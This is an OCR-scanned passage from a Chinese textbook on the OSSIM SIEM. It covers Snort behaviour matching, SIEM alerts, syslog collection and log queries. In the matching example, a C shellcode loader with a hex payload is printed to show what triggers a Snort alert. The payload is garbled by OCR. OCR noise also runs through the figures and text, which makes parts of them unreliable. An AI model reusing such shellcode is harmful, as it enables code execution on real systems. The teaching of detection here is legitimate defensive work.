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OSSIM 系统 通过 Sensor 中 的 嗅 探 模式 ， 来 实现 异常 行为 分 析 ， 实 质 是 通过 对 网 络 数据 包 
进行 分 析 ， 同 时 匹配 网 络 行为 特征 库 实现 。 行 为 匹配 模块 又 包括 字符 串 匹 配 、 协 议 匹 配 、 长 度 
匹配 和 逻辑 匹配 。 


(1) 字符 串 匹 配 是 系统 最 主要 的 匹配 方式 之 一 。 根 据 对 某 个 网 络 异常 行为 数据 包 的 深度 
分 析 , 提取 出 数据 包 内 容 字段 中 字符 串 特征 。 通 常 该 系统 经 过 协议 分 析 后 , 再 进行 字符 串 匹 配 。 
此 外 ,还 有 数据 包 大 小 匹配 ， 它 也 属于 字符 串 匹 配 。 这 种 匹配 方式 只 针对 数据 包 某 段 内 容 字 段 
中 的 长 度 匹配 ， 而 不 是 具体 的 字符 串 进行 匹配 。 

(20 数量 匹配 是 通过 对 某 些 事件 出 现 的 数量 来 产生 新 的 事件 。 

G) 协议 匹配 主要 通过 数据 包 采 集 模 块 ， 将 网 络 数据 包 按 照 协 议 分 析 的 结果 ， 对 协议 相 
应 的 字段 进行 检测 。 协 议 匹 配 需要 对 TCP/IP 各 层 的 协议 进行 分 析 , 对 应 用 层 协议 分 析 , 如 Ntop 
服务 ， 可 以 显著 地 提高 匹配 的 效率 。 


为 了 提高 匹配 的 效率 ， 匹 配 时 按照 网 络 行为 库 与 数据 包 内容 匹 配 的 要 求 去 匹配 相应 的 部 
分 ， 并 不 需要 对 整个 包 体 部 分 进行 匹配 。 


6.8.2 ”举例 

网 络 行为 库 记 录 了 常见 网 络 行为 (主要 是 网 络 异常 行为 )》 的 “特征 码 ”， 利用 它们 来 与 获 
取 到 的 网 络 数 据 包 进行 匹配 分 析 ， 以 发 现 异常 的 网 络 数据 包 。 

在 网 络 中 传输 的 数据 包 都 有 它 的 内 容 ， 也 称 数据 包 净 荷 , 一 般 以 十 六 进 制 数 表示 。 一 条 网 
络 行为 需要 很 多 属性 来 描述 , 包括 数据 包 包头 信息 、 数 据 包 内 容 、 行 为 描述 等 。 数 据 包 包 头 包 
括 IP 3c. TCP 头 、UDP k, ICMP 头等 ， 其 中 IP 头 记 录 了 数据 包 的 源 地 址 、 源 端口 、 目 标 地 
址 、 目 的 端口 以 及 其 他 一 些 TCP/IP 中 规定 的 IP 头 应 有 的 字段 。 


Exploit/shellcode 
例如 Shellcode 代码 : 


#include ^stdio.h^ 

#include“stdlibh' 

char shellcode[] = 
“\x33\xc9\x83\xed\xdd\xd9\xee\xd9\x7d\x24\xfd\x5b\x81\x73\x13\x98” 
“\xdd\x82\xlc\x83\xeb\xfc\xe2\xfd\x6d\xac\xc6\xlc\x98\x44\x09\x59” 
“\xad\xcf\xfe\xl19\xe0\xd5\x6d\x97\xd7\x5c\x09\xd3\xb8\x45\x69\x55” 
“\x13\x70\x09\xld\x76\x75\x42\x85\x34\xcO\xd2\x68\x9f\x85\x48\x11” 
“\x99\x86\x69\xeB\xa3\x10\xa6\xl8\xed\xal \x09\xd3\xbc\x45\x69\x7a” 
“\xl3\x48\xc9\x97\xcT\x58\x83\xf7\x13\x58\x09\x1d\x73\xcd\xde\x38” 
“\x9c\x87\xb3\xdc\xfc\xcf\xc2\x2c\xld\x8d\xfa\xl0\x13\x04\x8e\x97” 
“\xeB\x58\x2f\x97\xf0\xdc\x69\x15\x13\xcd\x32\xlc\x98\x44\x09\x74” 
“\xad\xlb\xb3\xea\xf8\x12\x0b\xed\xlb\x84\xf9\xdc\xf0\xb4\x08\x18” 
“\xcT\x2c\xla\xe2\xl2\xda\xd5\xe3\x7f\x27\xe3\x70\xfb\x6a\xeT\x64” 
“\xfd\x44\x82\xlc’; 

int main (int argc, char *argv[]) 


int *ret; 
ret-(int *)&ret+2, 
jb. (int) shellcode; 


此 时 会 触发 SIEM 报警 ， 如 图 6-44 所 示 。 
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SIGNATURE '"DATEGMT-7004 SOURCE DESTINATION USERNAME s PRIO REL RISK 
s+ 
0 加 网 网 加 Snot。 20504185213547  WNIN22z1193 12745368 212223193123143 — envy Uz [ — mj i-i $— 
ATTACK RESPONSE 
Rom enbarg Shelcode" 


INSERT INTO DS GROUP 


DATE ALIENVAULT SENSOR. INTERFACE 
2015-04-18 21:3547 GMT-7.00 sl dommya 

TRIGGERED SIGNATURE EVENT TYPEID CATEGORY SUB-CATEGORY 

ONCE N Snort "ET ATTACK, RESPONSE Rothenburg Shellcode* 2009247 Exploit. shellcodr 
NORMALIZED | 

EVENT 
DATA SOURCE NAME PRODUCT TYPE DATA SOURCE ID. 
sor Intrusion Detection. 1001 

SOURCE ADDRESS SOURCE PORT DESTINATION ADDRESS DESTINATION PORT PROTOCOL 

99212225 18825 45358 19o212225108228 143 Te 


图 6-44 典型 SIEM 报警 


网 络 异常 行为 都 在 产生 新 的 变异 ， 因 此 网 络 行为 库 必须 时 常 更 新 , 添加 新 的 行为 规则 。 一 
般 情 况 下 ， 有 两 种 更 新 网 络 行为 库 的 方法 (该 方法 对 网 络 行为 提取 人 提出 了 很 高 的 要 求 , 需要 
精通 网 络 知识 且 具 备 丰 富 的 实践 经 验 )， 一 种 是 通过 实验 蜜 饮 系 统 从 Internet. 中 提取 网 络 行为 
以 更 新 网 络 行为 库 ， 另 一 种 是 通过 Snort 系统 的 规则 库 提取 网 络 行为 以 更 新 网 络 行为 库 。 


6. 1 0 小 结 


本 章 重 点 讲解 了 Snort 预 处 理 器 ，snort 日 志 分 析 方 法 和 可 疑 流 量 和 异常 行为 分 析 方 法 , 包 
括 snort 规则 分 析 和 编写 。OSSIM 中 Snort 内 置 的 一 些 规则 ， 只 用 来 学 习 还 不 够 ， 要 想 发 挥 作 
用 , 还 需要 结合 企业 自身 的 业务 , 在 网 络 风险 和 威胁 不 断 变化 中 , 经 常 验证 这 些 规则 是 否 有 效 ， 
及 时 更 新 和 修改 规则 。 


368 


OF Vx n 
s pss 
, - Open. Source Security ecd 


E Information Manageme 


第 7 章 
< OSSIM 日 志 收 集 与 分 析 > 


从 本 章 可 以 学 习 到 : 


Syslog 协议 

Rsyslog 配置 方法 

网 络 设备 日 志 分 析 

Linux 各 种 服务 的 日 志 分 析 
OSSIM 日 志 管 理 

€ 用 Snare/WMI 收 集 Windows 日 志 


以 铀 为 镜 ， 可 以 正 衣冠 ， 以 人 为 镜 ， 可 以 明 得 失 。 我 们 分 析 日 志 就 能 了 解 系统 中 的 问题 。 
通过 本 章 的 内 容 讲解 掌握 如 何 获 取 并 分 析 各 类 系统 的 日 志 学 习 好 本 章 内 容 将 为 后 续 章 节 的 案 
例 分 析 打 下 坚实 的 基础 。 

当 企业 网 络 的 规模 及 应 用 系统 不 断 增 大 时 , 如 何 确保 网 络 运营 环境 的 稳定 、 安 全 、 高 效 呢 ? 
我 们 先 看 看 系统 管理 员 不 得 不 面临 的 问题 一 如何 监控 用 户 的 网 络 应 用 行为 ?如 何 跟踪 网 络 应 

用 资源 的 使 用 情况 ?如 何 识别 网 络 中 的 异常 流量 和 性 能 瓶颈 ?如 何 有 效 地 规划 和 部 署 网 络 资源 ? 
如 何 迅 速 响应 网 络 的 故障 告警 ? 日 志 技 术 可 以 记录 系统 产生 的 所 有 行为 , 并 按照 某 种 规范 表达 
出 来 。 日 志 系统 指 收集 网 络 设备 的 事件 信息 的 一 套 机 制 。 我 们 可 以 使 用 日 志 记录 的 信息 为 系统 
进行 排 错 ， 并 优化 操作 系统 性 能 。 


日 志 分 析 现 状 


企业 信息 系统 中 会 包含 多 种 设备 ， 如 路 由 器 、 防 火 墙 、IDS/IPS 、 交 换 机 、 服 务 器 和 SQL 
Mod 库 等 。 各 种 复杂 的 应 用 系统 和 网 络 设备 每 天 都 会 产生 大 量 的 日 志 , 如果 不 加 以 收集 , 一 旦 

了 问题 需要 查找 如 此 海量 的 数据 ， 对 于 管理 员 来 说 如 同 是 一 场 疆 梦 。 

目前 ， 不 少 企 业 网 络 环境 中 ， 日 志 的 存储 和 分 析 没有 受到 重视 ， 往 往 在 平时 忙碌 的 工作 
中 被 忽视 掉 ， 只 有 在 系统 提示 磁盘 空间 不 足 或 者 系统 瘫 病 了 才 引 起 管理 员 注意 。 例 如 ， 在 
Windows 服务 器 中 频繁 出 现 报 警 , 这 时 从 Windows 事件 查看 器 的 应 用 程序 日 志 里 看 到 内 容 为 : 
“Windows (2592) Windows: 由 于 系统 错误 112 (0x00000070) :磁盘 空间 不 足 。” 类 似 上 述 
情况 同样 会 发 生 在 Linux/Unix 系统 中 ， 如 果 处 理 不 及 时 ， 很 可 能 导致 系统 宕 机 。 例 如 在 一 台 
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Linux 服务 器 上 检查 到 一 段 日 志 信 息 : 
May 20 01:13:00 www.write.com kernel: pdi 1503 (dd) ,udi 3 inumber 9833 on /var: 
filesystem full 
从 上 面 这 段 日 志 就 能 发 现 系统 的 /var/ 文 件 系统 已 满 继续 检查 发 现 /var/spool 人 /var/squid/cache、 
Avarwww/、ANarlib/mysql/ 这 几 个 目录 占用 磁盘 空间 很 大 ， 需 要 用 合适 的 方法 处 理 。 
另 一 种 情况 ， 当 磁盘 空间 不 足 时 , 一 些 管 理 员 首先 想到 简单 地 移 走 文件 或 直接 删除 ， 只 考 


虑 日 志 会 


占用 空间 , 没 考虑 到 日 志 今后 可 以 作为 司法 取证 的 分 析 材 料 ,因为 在 日 志 里 可 以 发 现 


故障 发 生 的 时 间 等 关键 信息 。 


TA 


志 记 录 内 容 


不 同 设备 记录 日 志 格式 不 同 ， 那 么 什么 样 的 日 志 才 是 有 利于 审计 和 有 利于 安全 信息 平台 
使 用 呢 ? 目前 国际 上 还 没有 统一 的 标准 去 衡量 ， 但 是 通常 来 讲 完整 的 日 志 应 该 包含 如 下 信息 : 


Who: 谁 登录 了 。 

What: 他 们 在 做 什么 ， 又 发 生 了 什么 。 

Where: 发 生 在 何 处 ， 在 哪 台 主机 ， 哪 个 文件 系统 上 ， 或 者 哪个 网 络 接口 等 等 。 
When: 何 时 发 生 ， 应 该 包含 开始 时 间 和 结束 时 间 。 


为 了 得 到 更 详细 的 内 容 ， 有 时 候 还 希望 得 到 : 为 什么 会 发 生 (Why), WIRE (How), 
以 及 发 生发 展 的 趋势 是 什么 ， 简 单 说 就 是 5W1H。 如 图 7-1 所 示 。 


如 何 发 生 ? 


为 什么 发 生 ? 


图 7-1 5SW- 1H 


有 关 安全 运营 的 日 志 记录 主要 包含 以 下 几 个 方面 : 


(1) 身份 认证 和 授权 。 
(2) 系统 变更 管理 〈 记 录 系 统 变更 或 组 件 变更 等 )。 
GO 网 络 威胁 管理 〈 由 防火 墙 ，IPS 设备 产生 )。 
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(4) 性 能 和 容量 管理 〈 包 括 系 统 各 种 阔 值 ， 如 CPU 利用 率 、 内 存 、 网 络 带 宽 占 用 等 )。 
(5) 业务 的 可 持续 性 管理 系统 开关 机 和 元 余 备 份 相关 功能 )。 


7.1.2 日 志 中 能 看 出 什么 

数据 是 企业 的 财富 ， 同 样 日 志 蕴 含 着 丰富 的 信息 。Ping 命令 是 在 平常 不 过 的 网 管 工具 了 ， 使 
用 ICMP X ping 对 方 主机 ， 就 知道 是 否 存活 。 但 在 故障 时 ， 能 够 ping 通 对 方 的 网 络 接口 ， 不 代 
表 机 器 正常 ， 也 有 可 能 系统 已 出 现 故 障 ， 这 样 就 需要 从 日 志 中 获取 详细 信息 。 日 志 不 仅 告诉 你 主 
机 是 否 存活 ， 还 能 够 告诉 你 主机 上 运行 应 用 程序 的 状态 ， 以 及 它们 在 做 什么 ， 在 真正 宕 机 前 发 出 
各 种 日 志 报警 信息 。 以 下 列举 了 某 主机 SSH 攻击 日 志 ， 我 们 看 看 能 读 出 那些 有 用 的 信息 ; 


Sep 17 07; 00; 02 webserver.com:sshd[20392] :Failed password for illegal user test 
from 192.168.11.2 port 33783 ssh2 


从 该 日 志 可 以 看 出 ， 用 户 test 登录 失败 ， 而 且 他 是 非法 用 户 ， 这 条 消息 表明 ， 一 个 攻击 者 
使 用 扫描 器 探测 服务 器 。 试 图 利用 字典 里 的 用 户 进行 试探 ， 但 攻击 还 没 成 功 。 

当然 ， 一 旦 攻击 成 功 ， 黑 客 接管 主机 后 完全 有 可 能 删除 这 条 日 志 (为 了 避免 日 志 被 删除 ， 
可 以 将 这 条 日 志 发 送 到 远程 的 日 志 收集 服务 器 集中 存储 )。 接 着 看 下 面 的 日 志 。 

Sep 17 10:09:10 webserver.com adduser[2341]: new user:name-test, uid-0,gid-0, 
home-/root/cgi,shell-/bin/bash 

很 显然 ， 从 这 条 消息 看 出 ， 系 统 添加 了 系统 管理 员 账户 名 称 为 test 用 户 ID 0 (相当 于 
root 权限 用 户 )。 

用 户 行为 会 被 日 志 记录 下 来 ， 比 如 用 户 登 录 、 注 销 和 启动 进程 等 ,系统 审计 工具 能 提供 细 
颗粒 的 日 志 记录 , 而 且 这 种 日 志 一 旦 被 系统 记录 并 收集 之 后 , 就 不 会 因 系统 故障 恢复 正常 而 被 
修改 ， 也 就 是 说 日 志 记录 了 系统 从 正常 一 故障 一 正常 的 完整 过 程 ， 由 于 每 条 日 志 都 有 时 间 戳 ， 
它们 提供 了 每 个 事件 的 时 间 顺 序 , 日 志 不 仅 告诉 我 们 发 生 了 什么 , 还 告诉 我 们 事件 发 生 的 时 间 
和 顺序 , 而 且 日 志 发 送 到 日 志 服务 器 后 也 提供 了 独立 的 日 志 收集 仓库 , 一 旦 原始 主机 上 的 日 志 
遭 到 破坏 〈 比 如 自 改 和 删除 )， 独 立 的 日 志 搜集 服务 就 是 可 靠 的 日 志 附 加 来 源 。 

例如 ， 在 Linux 中 普通 用 户 通 过 sudo 来 执行 管理 员 命令 ， 无 意 间 删除 了 重要 的 系统 文件 
而 导致 故障 ， 在 取证 时 ，sudo 日 志 提供 了 取证 日 志 。 又 如 ， 用 户 张 三 在 很 短 的 时 间 内 ， 从 地 
域 跨度 很 大 的 两 个 不 同 的 位 置 ， 用 SSH 方式 登录 系统 ， 这 种 异常 行为 就 非常 可 疑 。 


7.1.3 日志 分 析 的 基本 工具 及 缺陷 

在 Unix/Linux 中 内 置 了 强大 的 命令 行 日 志 分 析 工 具 ， 例 如 grep、awk、tail、sed 等 ， 用 它 
们 分 析 简 单 的 日 志 没有 问题 然而 随 着 日 志 尺 寸 的 不 断 增 大 这 种 分 析 工具 也 暴露 出 一 些 问题 : 

(1) 不 同日 志 之 间 无 法 关联 ， 用 人 工分 析 法 无 法 同时 分 析 来 自 不 同 网 络 设备 的 日 志 ， 更 
无 法 摘 清楚 整个 网 络 攻击 是 如 何 发 生发 展 的 。 

(2) 在 超过 一 GB 大 小 的 日 志 中 检索 信息 非常 困难 。 
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G) Grep 这 样 的 工具 只 能 对 明确 的 关键 字 信 息 检 索 ， 无 法 生成 统计 趋势 和 异常 行为 。 
以 上 问题 都 可 以 在 OSSIM 系统 的 日 志 分 析 平 台中 得 到 解决 。 


7.14 海量 日 志 收集 方式 

一 个 海量 日 志 收集 系统 ， 首 先 要 考虑 采用 什么 样 的 日 志 采 集 模型 。 一 般 有 两 种 方式 ， 推 送 
(PUSH) 方式 和 拉 (PULL) 方式 。 我 们 常见 的 Syslog、Rsyslog 就 是 采用 推送 (PUSH) 方 式 ， 再 
比如 Facebook. Scribe 也 采用 了 PUSH 方式 ， 这 种 方式 要 求 日 志 收 集 存储 容量 大 ， 至 少 要 大 于 峰值 
时 的 数据 生成 量 ， 和 否则 主动 推送 过 来 的 数据 将 来 不 及 处 理 ， 另 外 如 果 设 置 不 正确 ， 会 收 到 虚假 的 
syslog 信息 ， 所 以 必须 了 解 那些 设备 启用 了 syslog。 而 拉 (PULL) 方式 的 日 志 收集 并 不 常用 。 


日 志 消息 格式 与 存储 


7.2.1 志 消 息 格 式 
以 OSSIM USM 企业 版 为 例 ， 讲 解 通过 rsyslog 收集 网 络 设备 的 日 志 ， 下 面 看 一 个 Cisco 
交换 机 传 来 的 日 志 ， 如 图 7-2 所 示 。 


'0000 


p SEARCH: (deiscAUNEPROTO sd mI TPREoEpn 


Timeframe selection GMT-4:00: Last 2 Hours | Last24 Hours LastMonth All Custom About 61,424 logs 
How e TIME RANGE: 2014-09-22 08:24:06 « 
Sep 26 07.25.59 19216811 
L1 20140926072559 sydog VinusllinOneSriGB 19216811100 0000 19216811.100 人 DR t2 
[ETT UE 
EVENT TYPE EVENT DETAIL 
NUN Sep 26072559 192168.1.100 12 00 00 39 *& NEPROTO-S UPDOWN Line protocol on Interface FastEthemet0/11 changed state to 
E 
sensor PRODUCT TYPE caneco Sus CATEGORY 
Vinuaiatinoneseice nmn m m 


USERDATAT USERDATAZ USERDATAS USERDATA4 USERDATAS USERDATA6 USERDATA7 USERDATAB USERDATAS 


cifed79057ad Sep 26 0725:59 192.168.11.10 12:00 00:00:39: WLINEPROTO SUP 

Eg 00-39. SLINEPROTO-S-UPDOWN:Li DOWN: Line protocol on Inte - ap -— cu E 二 
SS26c3 ne protocol on Interface FastEtheme rfaceFastthemetü/li chan SP z 
5 10/11. changed state to up ged state to up 


图 7-2. OSSIM 记录 的 syslog 日 志 数据 


在 图 7-2 中 由 Cisco 交换 机 生成 的 Syslog 消息 , 其 中 DATA 栏 的 信息 包括 日 志 消 息 的 时 间 
戳 ， 内 容 有 接收 的 月 日 时 分 秒 。192.168.11.100 是 交换 机 的 IP 地址 ， 后面 冒 号 的 作用 是 和 日 
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志 消 息 内 容 分 开 。 在 %LINEPROTO-5-UPDOWN 中 ， 数 字 5 表示 优先 级 ，5 级 表示 严重 事件 。 


7.2.2 OSSIM 下 的 日 志 查 询 比 较 
在 OSSIM USM 中 ， 输 入 关键 字 系统 会 自动 匹配 数据 源 ， 如 图 7-3 所 示 。 


INDEXED QUERY | RAWQUERY 


24 Hours — LastWeek Last Mon 


SEARCH: 


datasource-cisco-router 


datasource!-cisco-router 
ection GMT-4:0D 

datasource-cisco-pix 
datasource!-cisco-pix 


 datasource-cisco-ids 


TIMER 
datasonrrel=riseo-ids 

TYPE 和 DESTINATION DEVICE 
datasourcel-cisco-vpn 

or datasource-cisco-acs prz 

router Vintu: 0000 19216811100 Dh 
datasource!-cisco-acs pinge 
data-cisco MW 


73 自动 匹配 关键 词 


查询 日 志 分 为 索引 查询 (Indexed Query). 和 RAW (Raw Query). 查询 两 种 ， 索 引 查询 是 
最 快速 的 方法 ， 而 RAW 日 志 查询 主要 是 查询 存储 在 /varossinylogs 目录 下 的 文本 文件 。RAW 
查询 会 通过 正则 表达 式 直接 匹配 你 所 检索 的 关键 字 , 会 直接 读 取 这 些 文本 文件 。 下 面 的 实验 通 
过 查询 Cisco-Router 日 志 来 对 比 这 两 种 方法 的 查询 速度 。 

首先 选择 RAW Query 查询 , 查询 范围 选择 AT, 表示 对 所 有 日 志 进行 查询 , 如 图 7-4 所 示 。 


SEARCH: aera een C o i eee 


About 1,951,330 logs 


Time frame selecuon GMT-4:00: — Last Hours Last 24 Hours ^ LastWeek LastMonth ENJ custom 
HOW [50 Tv] ENTRI TIME RANGE: 2001-01-01 00:00:00 <-> 2015-05-07 03:04:00 CMT-4:00 
ID 4DATEGMT-&O0w TYPE SENSOR SOURCE DESTINATION DEVICE DATA SIGNATURE 


Apr 2L 07:37:33 192.158.1110 10: 010459; 
121 20150421073733 $2  wrualUSMAlInOne 192168.11.105 0000 19216811100 PO PING CONFLICT: DHCP adaress confet server L.] — d Validate 
Pinga 
cisco W 92.158.11.100 10: 01:04:59: 
j2 20150421073733 (S52, VirtualusMAllnone 192168.:1.105 0600 92.16811.100 Of CPD PINE- CONPUCT DHCP address conflet sever Ll d Vale 
pinge 5 
x: Apr 11 08:12:28 192.158.11.100 13: 08:58:02: WRCMD- 
)3 2015-04-11 08:1228 (AO.  VirtualUSMAllinOne 19216811105 0.0.0.0 192.168.11.100  4-RSHPORTATTEMPT: Attempted to connect to RSHELL — [.]  @ Valdote 


from 192.168.11.105 


Apr L1 98:12:28 192.168.1100 14: 08:58:03; SREMD- 
cisco c3 


14 20150411081228 Si Virtualu5MAllnone 19216811105 0000 19216811100 MPT: Attempted to connect to RSHELL — [.] — s Valaato 
rom from 192.168. 11.109 
m: Apr 10 232246 19235811100 12: 00:07:49: ssY5-5- 
25 2050410232216 (2.  wualUsMAlnOne 1921681122 0000 192.168.1100 Configured from console Dy viyo Ld db Validate 
RES 09 
pe Apo 2203119216811 100 11.00 06.04 ssY5-5- 
6 20150410232031 f". viualUSMAlInone 192168122 0000 19216811100 CONG rom console by vtyO LJ d Vaise 


[EE 


pA pr 10 23:19:43 192.188.11.100 10: 00:05:16: 
127 20150410231943 SCO WtualUSMAlllnOne 19216811100 0000 192168.11.100 eis $ "UFDOWN: Line protocol on Interface Vian, L-]  @ Valaste 
x changed state to down 


Apr 10 23:13:34 192.188.11.100 10: 00:13:28: %5YS-5— 


GO VirtualusMalnone 19216811100 0000 19216811100 RELOAD: Reload requested L1. @ Validato 


58 2015041021534 SO 


7-4 Hi Raw Query 方式 查询 路 由 器 日 志 
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在 195 万 条 日 志 中 查询 ， 花 费 的 时 间 为 92s。 接 下 来 还 是 同样 的 查询 范围 ， 选 择 “Indexed 
Query”， 如 图 7-5 所 示 。 


SEARCH:  datasource-cisco-router X EXPORTS | PREDEFINED SEARCHES 


Time frame selection CMT-4:00: Last 2 Hours ^ Last24Hours ^ lastWeek Last Month Custom bout 1a51:ssn tags 


sHOW [50 [v 


ES CLICK HERE TO SORT BY DESCENDING DATE TIME RANGE: 2001-01-01 00:00:C 


ID ^DATEGMT-400w — TYPE SENSOR SOURCE DESTINATION DEVICE DATA SIGN. 


Apr 10 23:13:34 192.168.1100 10: 00:13:28: % 


Lii 2015041023:1334 SO. VirualusMAlinone 19216811100 00.00 19216811100 — S/S-S-AELOAD: Reload requeste Lj av 


r 10 23:19:43 192.168.11.100 10: 00:05:16: % 
L2 201504-1023:19.43 SSC%  VirtualUSMAllinOne 192 168.11.100 0.0.00 19216811.100 — LINEPROTO-5-UPDOWN: Line protocol on rj 4v 
router Interface Vian2, changed state to down 


Apr 10 23:20:31 192.168.11.100 11: 00:06:04: % 
143 2015041023203! GCO, VirtualUSMAllInOne 192168.1.22 0000 13216811.100 — SYS-5- CONFIG.I: Configured from console byvtyO [.] — & V 
router (192.168.11.22) 


* 10 23:22:16 192.168.11.100 12: 00:07:49: % 
j 4 2015041023:22:16 SSC% virualUSMAllInOne 19216811.22 0000 19216811.100 — SYS-S-CONFIG. I: Configured from console by vty0 [...] — & V 
3 router (192.168.11.22 
eu Apr 11 08:12:28 192.168.11.100 14: 08:58:03; % 
$5 201504-1108:12:28 rer VirtualUSMAllinOne 192168.11.105 00.00 192.16811.0100 — RCMD-4-RSHPORTATTEMPT: Auempted to Lj aY 
pais connect to RSHELL from 192.168.11.105 


r 11 08:12:28 192.168.11.100 13: 08:58:02. 
146 201504-1108:1228 Qc0  virtualUSMAllInOne 192.168.11.105 0.00.0 19216811.100 — RCMD-4-RSHPORTATTEMPT: Attempted to 
TU connect ro RSHELL from 192.168.11.105 


SHOWING 1 TO 6 EVENTS Indexed ime: 4.76 seconds. 


ery 


7-5 用 Indexed Query 方式 查询 


这 次 查询 时 间 仅 为 4.76s。 为 了 缩短 查询 时 间 ， 大 家 可 以 采用 自 定义 时 间 区 间 的 方法 ， 
减 小 查询 负担 。 在 Custom 按钮 的 右 侧 ， 可 以 查看 最 近 一 次 系统 建立 索引 的 时 间 ， 如 图 7-6 所 
示 。 


si 


Time frame selection GMT-4:00: — Last2 Hours ^ Last24Hours ^ Last Week ^ Last Month 
图 2015-05-01 oo — -图 2015-05-04 06:31:45 


May 2015 


SU MO TU WE TH FR SA 


v ENTRIES m TIME RANCE: 2015-05-01 00:00:00 <-> 2015-05-04 09:31:45 CNT-4:0 
a 4 s eH s » 
ADATEGMTAO0w TYPE SENSOR |30| 33| 12) da | 14| d& i DEVICE DATA 


17 18 19| 20 21/22 23 
09:31:45 VirtualUSMAlllnOne sudo: www-data : 
4 ESI R26] Z4 V5] NES nknown ; PWD- /usr/share/ossim/www/ sem ; E: 


toot : COMMAND=/usr/share/ossim/ 


2015-05-04 09:31:45 sudo VirualUSMAllinor 30141405. 19216811105 


7-6 根据 日 期 查询 


7.2.3 ”日志 的 导出 
我 们 可 以 选择 “Exports” 按 钮 ， 将 查询 结果 导出 ， 当 你 输入 查询 条 件 和 时 间 范 围 之 后 ， 
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单 击 “Screen export”， 系 统 生 成 一 条 记录 ， 如 图 7-7 所 示 ， 单 击 也 按钮 就 可 以 直接 下 载 。 


frame selection CMT-4:00 r 


015-05-04 07:00:00 


图 7-7 导出 某 段 时间 范 围 内 的 SSH 日 志 
下 载 的 文件 是 ZIP 格式 ， 例 如 admin 20150504110000 20150504135206 
_none_d41d8cd98f00b204e9800998ecf8427e.zip， 首 先 需 要 解压 缩 。 内 容 如 图 7-8 所 示 。 
5/05/04/13/192.168.11.105/2015-85-904T13-998-08.01 


. re 
5 VirtualUSsMAllInOne sudo 
SER-root ; COMMAND= 


图 7-8 查看 收集 到 的 日 志 
查询 的 关键 字 存储 起 来 方便 下 次 查阅 。 


通过 预定 义 查询 (Predefined Searches) 可 以 将 经 


7.24 日 志 分 类 可 视 化 
OSSIM USM 中 可 按 年 月 日 的 方式 显示 收集 来 的 日 志 ， 如 图 7-9 所 示 ， 我 们 可 以 单 击 图 中 
右 侧 所 示 的 扇形 图 标 ， 它 的 功能 是 将 日 志 分 类 显示 。 


DASHBOARDS | ENVIRONMEN REponrs CONFIGURATION 


RAWLOGS r3 o 


图 7-9 日 志 显 示 
当 单 击 图 7-9 所 示 的 日 志 分 类 图 标 后 ， 系 统 自动 将 日 志 根 据 数据 源 进行 分 类 ， 还 能 根据 传 
感 器 、 事 件 类 型 、 源 和 目标 地 址 分 类 显示 ,分 析 涵 盖 了 对 事件 的 归 类 统计 及 事件 的 变化 发 展 趋 
势 ， 如 图 7-10 所 示 。 
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LOGGER GRAPHS GMT-4:00 


图 7-10 日 志 按 数据 源 分 类 显示 


复杂 的 日 志 经 过 数据 处 理 之 后 ,摇身一变 成 了 直观 的 图 形 化 日 志 , 便于 管理 , 还 有 更 多 可 
视 化 日 志 分 析 小 工具 Gltail 、 Logstalgia 及 Gource 参见 博文 
http://chenguang.blog.5 1cto.com/350944/1329318。 


7.25 ”基于 文本 格式 的 日 志 

由 于 应 用 程序 生成 基于 文本 的 日 志 对 系统 开销 (CPU 以 及 磁盘 IO ) 而 言 比较 低 ， 阅 读 性 
比较 强 ， 能 够 使 用 grep. more. awk, sort 查询 及 过 滤 处 理 ， 所 以 大 量 出 现在 UNIX/Linux 系 
统 中 。 

系统 通常 首先 创建 一 个 空 文件 ， 例 如 /var/log/apache.log， 向 其 中 不 断 写 入 新 的 日 志 条 目 ， 
直到 大 小 超过 一 定 限制 ， 然 后 再 分 成 另 一 个 文件 ， 例 如 access.log.1、access.log.2、access.log.3 
(我 们 可 以 在 /etc/logrotate.conf 查看 配置 ) 并 继续 写 入 ， 直 到 分 区 /var 空间 耗 尽 为 止 。 又 如 在 
OSSIM 系统 下 的 OSSEC 日 志 ， 如 下 所 示 。 


VirtualAllInOne6x1GB:/var/ossec/logs/alerts/2014/Sep$ 13 -1 
total 18196 

-rwxrw---- 1 www-data ossec 14143348 Sep 26 19:45 os 
-rwxrw---- 1 www-data ossec 4388089 Sep 27 23:57 oss 27 

- 1 ossec ossec 2056 Sep 29 00:02 ossec-alerts-: 28. dog: gz 


-rw- 
-IW-I] - 1 ossec ossec 334 Sep 29 00:02 ossec- -alerts-28. og sum 
-rwxrw---- 1 www-data ossec 52918 Sep 29 12:31 ossec-alerts- 


从 上 面 看 出 ， 日 志 根 据 接收 事件 的 年 、 月 来 组 织 ， 所 以 要 想 检索 2014 年 9 月 之 后 的 日 志 
我 们 只 要 进入 /var/ossec/logs/alerts/2014/Sep 目录 下 查询 即 可 而 不 用 查询 所 有 ossec 保存 日 志 。 
从 这 些 日 志 生成 时 间 还 能 看 出 ， 它 们 是 根据 时 间 先 后 顺序 排序 。 我 们 把 这 种 文件 称 为 扁平 文 
件 ， 之 所 以 这 么 取 名 是 因为 这 样 的 文件 是 扁平 的 、 无 模式 的 一 种 自由 格式 ， 查 询 和 阅读 都 非常 
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方便 。 无独有偶 ， 在 MS IIS 服务 器 的 日 志 格式 为 ex+ 年 份 的 末 两 位 数字 + 月 份 + 日 期 ， 其 日 志 
默认 位 置 在 %systemroot%\system32\logfiles\ 下 ， 我 们 使 用 任何 文本 编辑 器 都 能 查看 。 

OSSIM 的 日 志 存 储 方式 和 Ossec 非常 类 似 , 也 是 采用 扁平 日 志 + 索 引 的 模式 , 我 们 在 OSSIM 
系统 中 ，/var/ossim/logs/2014/09/26 目录 下 就 能 看 到 当天 以 小 时 为 单位 的 日 志 ， 为 了 从 宏观 上 观 
察 这 些 目录 , 我 们 使 用 了 磁盘 分 析 工 具 展现 /var/ossinylogs 目录 中 数据 分 布 情况 ,图 7-11 中 最 外 
围 圆圈 的 绿色 扇形 区 域 表 示 了 每 小 时 所 记录 的 日 志 ， 这 些 日 志 使 用 任何 编辑 器 打开 。 


Disk Usage Analyzer 


Analyzer Edit View Help 
à ScanHome L3 DE à g 


“otal filesystem capacity 967.2 GB lused: 11.0 GB available 956 2 GB | View as Rings Chart 


Folder Usage Size ^ Contents 
"1 HN 100 108GB — 23 items 
Y var ENNE 677% 7368 18items 
b lib ENENNO 068 6468 64items 
b cache E— ——1 101% 7544M8 18items 
v ossim C _ 10% 730M8 Bitems 
HL 997% 720M8 6Xems 
* 2014 ENNENNNNE 999% 727MB 5 items 
vo EE 1000% 72.7 MB 6 items 1s 
26 ENNN 73 675% 491M8 19items 
7101 E 213% 105MB 6 items 16 
192.158.11.105 [ET — 7] 40.3% 42M8 — 18items A 
